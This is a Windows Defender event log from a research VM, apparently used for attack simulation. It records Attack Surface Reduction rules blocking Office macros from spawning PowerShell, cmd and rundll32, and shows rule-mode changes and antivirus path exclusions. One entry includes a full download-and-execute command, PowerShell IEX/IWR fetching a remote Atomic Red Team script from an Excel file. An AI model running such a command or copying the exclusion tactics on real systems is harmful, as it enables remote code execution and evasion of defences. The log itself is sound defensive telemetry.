11/17/2023 05:18:05 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2340 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:18:05.565Z User: researchvmhaa\research Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: powershell.exe Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 05:17:08 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2339 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:17:08.694Z User: researchvmhaa\research Path: C:\Windows\System32\calc.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\calc.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 05:16:52 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2338 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T17:16:52.179Z User: researchvmhaa\research Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 04:44:11 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2319 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T16:44:11.592Z User: researchvmhaa\research Path: C:\Windows\System32\rundll32.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls" Involved File: C:\Users\research\Desktop\macs\mac5.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 04:43:58 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2318 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C Detection time: 2023-11-17T16:43:58.799Z User: NT AUTHORITY\SYSTEM Path: C:\Windows\System32\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Target Commandline: "cmd" Parent Commandline: C:\Windows\PSEXESVC.exe Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 04:43:58 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2317 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C Detection time: 2023-11-17T16:43:58.666Z User: NT AUTHORITY\SYSTEM Path: C:\Windows\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Target Commandline: "cmd" Parent Commandline: C:\Windows\PSEXESVC.exe Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 04:38:21 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2316 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\research\Desktop = 0x0

11/17/2023 04:37:39 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2311 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\research\Desktop\macs = 0x0

11/17/2023 04:35:02 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2297 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T16:35:02.260Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1') Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\mac1.xls" Involved File: C:\Users\research\Desktop\mac1.xls Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009

11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2291 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2290 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2289 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2288 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2287 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2286 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2285 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2284 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2283 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2282 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2281 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2280 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2279 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2278 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2277 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6 11/17/2023 04:29:22 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=2276 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x1 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6 11/17/2023 04:29:02 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2273 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. 
ID: 26190899-1602-49E8-8B27-EB1D0A1CE869 Detection time: 2023-11-17T16:29:02.666Z User: researchvmhaa\research Path: C:\Windows\System32\cmd.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Target Commandline: "C:\Windows\System32\cmd.exe" Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 04:27:34 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2272 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C Detection time: 2023-11-17T16:27:34.524Z User: NT AUTHORITY\SYSTEM Path: C:\Windows\cmd.exe Process Name: C:\Windows\PSEXESVC.exe Target Commandline: "cmd.exe" Parent Commandline: C:\Windows\PSEXESVC.exe Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 04:05:15 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2083 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. 
ID: 9E6C4E1F-7D60-472F-BA1A-A39EF669E4B2 Detection time: 2023-11-17T16:05:15.532Z User: NT AUTHORITY\SYSTEM Path: C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe Process Name: C:\Windows\System32\lsass.exe Target Commandline: "C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe" Parent Commandline: Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 03:59:51 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2082 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T15:59:51.981Z User: researchvmhaa\research Path: C:\Windows\System32\calc.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\calc.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/17/2023 03:59:16 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=1121 EventType=3 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Warning RecordNumber=2081 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator. For more information please contact your IT administrator. 
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A Detection time: 2023-11-17T15:59:16.861Z User: researchvmhaa\research Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE Target Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" Involved File: Inheritance Flags: 0x00000000 Security intelligence Version: 1.401.751.0 Engine Version: 1.1.23100.2009 Product Version: 4.18.23100.2009 11/16/2023 09:28:52 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1903 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: Default\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender New value: HKLM\SOFTWARE\Microsoft\Windows Defender\ProductAppDataPath = C:\ProgramData\Microsoft\Windows Defender 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1867 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1866 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1865 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1864 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1863 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. 
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1862 Keywords=None TaskCategory=None OpCode=Info Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware. Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6 New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1 11/16/2023 05:36:57 PM LogName=Microsoft-Windows-Windows Defender/Operational EventCode=5007 EventType=4 ComputerName=researchvmhaa User=NOT_TRANSLATED Sid=S-1-5-18 SidType=0 SourceName=Microsoft-Windows-Windows Defender Type=Information RecordNumber=1861 Keywords=None 